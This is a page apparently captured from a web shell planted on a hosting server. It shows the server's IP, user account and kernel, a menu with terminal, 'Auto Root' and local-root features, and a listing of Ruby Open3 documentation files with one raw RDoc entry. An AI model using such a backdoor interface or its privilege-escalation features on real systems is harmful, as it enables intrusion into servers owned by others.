Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Open3 /
Delete
Unzip
Name
Size
Permission
Date
Action
capture2-c.ri
1.17
KB
-rw-r--r--
2023-07-26 17:26
capture2-i.ri
1.17
KB
-rw-r--r--
2023-07-26 17:26
capture2e-c.ri
842
B
-rw-r--r--
2023-07-26 17:26
capture2e-i.ri
842
B
-rw-r--r--
2023-07-26 17:26
capture3-c.ri
1.82
KB
-rw-r--r--
2023-07-26 17:26
capture3-i.ri
1.82
KB
-rw-r--r--
2023-07-26 17:26
cdesc-Open3.ri
1.74
KB
-rw-r--r--
2023-07-26 17:26
pipeline-c.ri
2.06
KB
-rw-r--r--
2023-07-26 17:26
pipeline-i.ri
2.06
KB
-rw-r--r--
2023-07-26 17:26
pipeline_r-c.ri
1.71
KB
-rw-r--r--
2023-07-26 17:26
pipeline_r-i.ri
1.71
KB
-rw-r--r--
2023-07-26 17:26
pipeline_rw-c.ri
1.93
KB
-rw-r--r--
2023-07-26 17:26
pipeline_rw-i.ri
1.93
KB
-rw-r--r--
2023-07-26 17:26
pipeline_start-c.ri
1.87
KB
-rw-r--r--
2023-07-26 17:26
pipeline_start-i.ri
1.87
KB
-rw-r--r--
2023-07-26 17:26
pipeline_w-c.ri
1.31
KB
-rw-r--r--
2023-07-26 17:26
pipeline_w-i.ri
1.31
KB
-rw-r--r--
2023-07-26 17:26
popen2-c.ri
1.32
KB
-rw-r--r--
2023-07-26 17:26
popen2-i.ri
1.32
KB
-rw-r--r--
2023-07-26 17:26
popen2e-c.ri
1.19
KB
-rw-r--r--
2023-07-26 17:26
popen2e-i.ri
1.19
KB
-rw-r--r--
2023-07-26 17:26
popen3-c.ri
1.84
KB
-rw-r--r--
2023-07-26 17:26
popen3-i.ri
1.84
KB
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI"pipeline_start:EFI"Open3#pipeline_start;FF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"BOpen3.pipeline_start starts a list of commands as a pipeline.;TI"4No pipe made for stdin of the first command and;TI" stdout of the last command.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"DOpen3.pipeline_start(cmd1, cmd2, ... [, opts]) {|wait_threads| ;FI" ... ;FI"} ;FI" ;FI"Cwait_threads = Open3.pipeline_start(cmd1, cmd2, ... [, opts]) ;FI" ... ;Fo; ; [I"&Each cmd is a string or an array.;TI"AIf it is an array, the elements are passed to Process.spawn.;T@o;; [I" cmd: ;FI"_ commandline command line string which is passed to a shell ;FI"_ [env, commandline, opts] command line string which is passed to a shell ;FI"b [env, cmdname, arg1, ..., opts] command name and one or more arguments (no shell) ;FI"h [env, [cmdname, argv0], arg1, ..., opts] command name and arguments including argv[0] (no shell) ;FI" ;FI"<Note that env and opts are optional, as Process.spawn. ;Fo; ; [I" Example:;T@o;; [I" # run xeyes in 10 seconds. ;FI")Open3.pipeline_start("xeyes") {|ts| ;FI" sleep 10 ;FI" t = ts[0] ;FI"# Process.kill("TERM", t.pid) ;FI"E p t.value #=> #<Process::Status: pid 911 SIGTERM (signal 15)> ;FI"} ;FI" ;FI"3# convert pdf to ps and send it to a printer. ;FI"1# collect error message of pdftops and lpr. ;FI"pdf_file = "paper.pdf" ;FI"printer = "printer-name" ;FI"err_r, err_w = IO.pipe ;FI"6Open3.pipeline_start(["pdftops", pdf_file, "-"], ;FI"3 ["lpr", "-P#{printer}"], ;FI"- :err=>err_w) {|ts| ;FI" err_w.close ;FI"9 p err_r.read # error messages of pdftops and lpr. ;FI"};F: @file000[ I"(*cmds, &block);TI"lib/open3.rb;T